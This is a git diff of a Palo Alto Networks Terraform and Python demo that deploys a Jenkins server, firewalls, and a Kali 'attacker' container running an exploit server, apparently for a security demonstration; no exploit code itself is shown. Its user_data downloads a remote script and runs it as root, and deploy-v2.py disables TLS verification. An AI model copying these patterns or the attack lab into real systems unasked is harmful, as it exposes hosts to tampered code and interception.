diff --git a/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml index 8d552e84..48a08a34 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml @@ -17,7 +17,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application @@ -40,16 +40,40 @@ variables: type_hint: password - name: aws_region description: AWS Region - default: us-east-2 - type_hint: text + type_hint: dropdown + dd_list: + - key: "us-west-1--- N.California" + value: "us-west-1" + - key: "us-west-2--- Oregon" + value: "us-west-2" + - key: "us-east-1--- N.Virginia" + value: "us-east-1" + - key: "us-east-2--- Ohio" + value: "us-east-2" + - key: "ca-central-1--- Canada Central" + value: "ca-central-1" + - key: "eu-west-1--- Ireland" + value: "eu-west-1" + - key: "eu-west-2--- London" + value: "eu-west-2" + - key: "eu-central-1--- Frankfurt" + value: "eu-central-1" + - key: "ap-east-1--- Hong Kong" + value: "ap-east-1" + - key: "ap-northeast-1--- Tokyo" + value: "ap-northeast-1" + - key: "ap-southeast-1--- Singapore" + value: "ap-southeast-1" + - key: "ap-southeast-2--- Sydney" + value: "ap-southeast-2" + - key: "ap-south-1--- Mumbai" + value: "ap-south-1" + - key: "sa-east-1--- Sao Paulo" + value: "sa-east-1" - name: aws_key_pair description: AWS Key Pair default: us-east-2-kp type_hint: text - - name: s3_bootstrap_bucket - description: S3 Bootstrap Bucket - default: unique_value - type_hint: text # Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath # determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file diff --git a/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml index 294792be..e83fc4aa 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml @@ -15,7 +15,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml index a312b3aa..4cdb1e69 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml @@ -17,7 +17,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. 
Each variable will be rendered as a form field in the panhandler application diff --git a/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml index 04548635..f139a57b 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml @@ -15,7 +15,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf b/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf index 03887cc2..ebd01015 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf @@ -14,9 +14,6 @@ variable "FW1_Untrust_IP" {} variable "FW1_Trust_IP" {} variable "FW1_mgmt_IP" {} - -variable "bootstrap_s3bucket" {} - variable "VPCName" {} variable "VPCCIDR" {} variable "ServerKeyName" {} @@ -52,20 +49,20 @@ variable "kali" { type = "map" default = { - "us-east-1" = "ami-092d0d014b7b31a08" - "us-east-2" = "ami-0a444079f17309e2a" - "us-west-1" = "ami-03e0ff3de0548396b" - "us-west-2" = "ami-07c2e617785343806" - "eu-west-1" = "ami-04bbe683cac096622" - "eu-west-2" = "ami-05f478183aa65246f" - "ap-northeast-1" = "ami-0093e807f67a5f1e7" - "ap-northeast-2" = "ami-06ffd66e21c3ceb62" - "ap-southeast-1" = "ami-0e22510ff08cbb147" - "ap-southeast-2" = "ami-0d4437b6104e6b9bd" - "eu-central-1" = "ami-08b17dda213f62471" - "sa-east-1" = "ami-05cfb15d232b8be2a" - "ca-central-1" = "ami-0e4c58a6a5ae9e417" - "ap-south-1" = "ami-0b13a1e1e3db28939" + "us-west-1" = "ami-0a3a5bb61a81e3135" + "us-west-2" = "ami-000de76905d16b042" + "us-east-1" = "ami-021d9d94f93a07a43" + "us-east-2" = "ami-04239d579c52de263" + "ca-central-1" = "ami-00ecb370195d6a225" + "eu-west-1" = "ami-09e0dc5839aa7eca9" + "eu-west-2" = "ami-0629d16d9e818369f" + "eu-central-1" = "ami-0d30b058bf84b0a0c" + "ap-east-1" = "ami-72661d03" + "ap-northeast-1" = "ami-0910fb379f9c0dda9" + "ap-southeast-1" = "ami-0dff5e99784353c4a" + "ap-southeast-2" = "ami-042ed6b729919aa24" + "ap-south-1" = "ami-0f382fa26248923ea" + "sa-east-1" = "ami-027c2142d479531cb" } } @@ -74,19 +71,19 @@ variable "UbuntuRegionMap" { #Ubuntu Server 16.04 LTS (HVM) default = { - "us-east-1" = "ami-092d0d014b7b31a08" - "us-east-2" = "ami-0a444079f17309e2a" - "us-west-1" = "ami-03e0ff3de0548396b" - "us-west-2" = "ami-07c2e617785343806" - "eu-west-1" = "ami-04bbe683cac096622" - "eu-west-2" = "ami-05f478183aa65246f" - "ap-northeast-1" = "ami-0093e807f67a5f1e7" - "ap-northeast-2" = "ami-06ffd66e21c3ceb62" - "ap-southeast-1" = "ami-0e22510ff08cbb147" - "ap-southeast-2" = "ami-0d4437b6104e6b9bd" - "eu-central-1" = "ami-08b17dda213f62471" - "sa-east-1" = "ami-05cfb15d232b8be2a" - "ca-central-1" = "ami-0e4c58a6a5ae9e417" - "ap-south-1" = "ami-0b13a1e1e3db28939" + "us-west-1" = "ami-0a3a5bb61a81e3135" + "us-west-2" = "ami-000de76905d16b042" + "us-east-1" = "ami-021d9d94f93a07a43" + "us-east-2" = "ami-04239d579c52de263" + "ca-central-1" = "ami-00ecb370195d6a225" + "eu-west-1" = "ami-09e0dc5839aa7eca9" + "eu-west-2" = "ami-0629d16d9e818369f" + "eu-central-1" = "ami-0d30b058bf84b0a0c" + "ap-east-1" = "ami-72661d03" + "ap-northeast-1" = 
"ami-0910fb379f9c0dda9" + "ap-southeast-1" = "ami-0dff5e99784353c4a" + "ap-southeast-2" = "ami-042ed6b729919aa24" + "ap-south-1" = "ami-0f382fa26248923ea" + "sa-east-1" = "ami-027c2142d479531cb" } } diff --git a/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf index a6d7cdef..411c7ff1 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf @@ -1,7 +1,18 @@ # Create a BootStrap S3 Bucket +resource "random_id" "bucket_prefix" { + byte_length = 4 +} + +#data "aws_s3_bucket" "jenkins" { +# bucket = "bootstrap_bucket" + +#region = "${var.aws_region}" +#} + resource "aws_s3_bucket" "bootstrap_bucket" { - bucket = "${var.bootstrap_s3bucket}" + #bucket_prefix = "${var.bucket_prefix}" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" acl = "private" force_destroy = true @@ -10,38 +21,42 @@ resource "aws_s3_bucket" "bootstrap_bucket" { } } -# Create Folders and Upload Bootstrap Files resource "aws_s3_bucket_object" "bootstrap_xml" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "config/bootstrap.xml" - source = "bootstrap/bootstrap.xml" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap/bootstrap.xml" } resource "aws_s3_bucket_object" "init-cft_txt" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "config/init-cfg.txt" - source = "bootstrap/init-cfg.txt" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap/init-cfg.txt" } resource "aws_s3_bucket_object" "software" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "software/" - source = "/dev/null" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "software/" + source = "/dev/null" } resource "aws_s3_bucket_object" "license" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "license/" - source = "/dev/null" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "license/" + source = "/dev/null" } resource "aws_s3_bucket_object" "content" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "content/" - source = "/dev/null" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "content/" + source = "/dev/null" } diff --git a/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml index adf9834a..e528f907 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml +++ b/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml @@ -741,13 +741,6 @@ - - - - download-and-install - - - diff --git a/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf b/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf index 4569fbf9..fda987d9 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf @@ -1,5 +1,17 @@ -resource "aws_iam_role" "JFFBootstrapRole" { - name = "JFFBootstrapRole" +resource "random_id" "bootstraprole" { + 
byte_length = 3 +} + +resource "random_id" "bootstrappolicy" { + byte_length = 3 +} + +resource "random_id" "bootstrapinstanceprofile" { + byte_length = 3 +} + +resource "aws_iam_role" "jenkins-bootstraprole" { + name = "jenkins-bootstraprole-${random_id.bootstraprole.hex}" assume_role_policy = < docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d diff --git a/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh new file mode 100644 index 00000000..bb37c3e5 --- /dev/null +++ b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d diff --git a/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars index 8e91975f..08cc43f9 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars +++ b/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars @@ -28,8 +28,6 @@ aws_region = "Region Here" ServerKeyName = "Keypair Here" -bootstrap_s3bucket = "Unique S3 Bucketname" - aws_access_key = "AWS Key" aws_secret_key = "AWS Secret Key" diff --git a/aws/Jenkins_proj-master/WebInDeploy/webservers.tf b/aws/Jenkins_proj-master/WebInDeploy/webservers.tf index b5beed04..09986a72 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/webservers.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/webservers.tf @@ -28,17 +28,10 @@ resource "aws_instance" "web1" { user_data = "${base64encode(join("", list( "#! 
/bin/bash\n", - "sudo su\n", - "apt-get update\n", - "apt-get update\n", - "apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes\n", - "pip3 install docker-compose\n", - "cd /var/tmp\n", - "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile\n", - "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml\n", - "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh\n", - "docker-compose build\n", - "docker-compose up -d\n" + "sudo cd /var/tmp\n", + "sudo wget -O initialize_webserver.sh https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh\n", + "sudo chmod 755 initialize_webserver.sh &&\n", + "sudo bash ./initialize_webserver.sh\n" ))) }" } diff --git a/aws/Jenkins_proj-master/attacker/Dockerfile b/aws/Jenkins_proj-master/attacker/Dockerfile index 9a63391d..3f2f2072 100644 --- a/aws/Jenkins_proj-master/attacker/Dockerfile +++ b/aws/Jenkins_proj-master/attacker/Dockerfile @@ -39,4 +39,4 @@ ENTRYPOINT ["/bin/tini", "--"] ENV FLASK_APP=/root/exp-server.py # CMD ["/usr/local/bin/run.sh"] -CMD ["flask run --host=0.0.0.0"] +CMD ["flask", "run", "--host=0.0.0.0"] diff --git a/aws/Jenkins_proj-master/attacker/docker-compose.yml b/aws/Jenkins_proj-master/attacker/docker-compose.yml index 812bba77..02cdb71b 100644 --- a/aws/Jenkins_proj-master/attacker/docker-compose.yml +++ b/aws/Jenkins_proj-master/attacker/docker-compose.yml @@ -4,4 +4,5 @@ services: build: . container_name: attacker ports: - - "443:443" \ No newline at end of file + - "443:443" + - "5000:5000" diff --git a/aws/Jenkins_proj-master/deploy-v2.py b/aws/Jenkins_proj-master/deploy-v2.py new file mode 100644 index 00000000..56763e3d --- /dev/null +++ b/aws/Jenkins_proj-master/deploy-v2.py @@ -0,0 +1,674 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
+ +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict +import requests +import urllib3 + +from azure.common import AzureException +from azure.storage.file import FileService + + +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + +def walkdict(d, key): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + stack = d.items() + while stack: + k, v = stack.pop() + if isinstance (v, OrderedDict): + stack.extend(v.iteritems()) + else: + if k == key: + value = v + return value + + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid =0 + jobid = '' + key ='job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. 
Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete " ) + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + else: + logger.info('Unable to determine job status') + + + # install latest anti-virus update without committing + getjobid =0 + jobid = '' + key ='job' + while getjobid == 0: + try: + + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + + else: + logger.info('Unable to determine job status') + + +def getApiKey(hostname, username, password): + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. 
Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + """ + For tracking purposes. Write responses to file. 
+ :param key: + :param value: + :return: + """ + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + """ + Generate a unique share name to avoid overlaps in shared infra + :param share_prefix: + :param account_name: + :param account_key: + :return: + """ + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def apply_tf(working_dir, vars, description): + + """ + Handles terraform operations and returns variables in outputs.tf as a dict. 
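The apply_tf() helper introduced here wraps python-terraform so that every stack is initialised, applied, and queried for outputs in the same way. A minimal usage sketch of that wrapper pattern is below; the variable values in the example call are illustrative, not taken from this repository.

from python_terraform import Terraform


def run_stack(working_dir, tf_vars):
    # init + apply without an interactive plan step, then return the parsed outputs.
    tf = Terraform(working_dir=working_dir)
    tf.cmd('init')
    return_code, stdout, stderr = tf.apply(var=tf_vars, skip_plan=True, capture_output=False)
    return return_code, tf.output()

# Example (hypothetical values):
# rc, outputs = run_stack('./WebInDeploy', {'aws_region': 'us-west-2', 'ServerKeyName': 'example-kp'})
# alb_dns = outputs['ALB-DNS']['value'] if rc == 0 else None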
+ :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + +def main(username, password, rg_name, azure_region): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap') + + if return_code == 0: + share_prefix = 'jenkins-demo' + resource_group = outputs['Resource_Group']['value'] + bootstrap_bucket = outputs['Bootstrap_Bucket']['value'] + storage_account_access_key = outputs['Storage_Account_Access_Key']['value'] + update_status('web_in_bootstrap_status', 'success') + else: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + print(json.dumps(status_output)) + exit(1) + + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # + # Build Infrastructure + # + # + + + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) + + + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = 
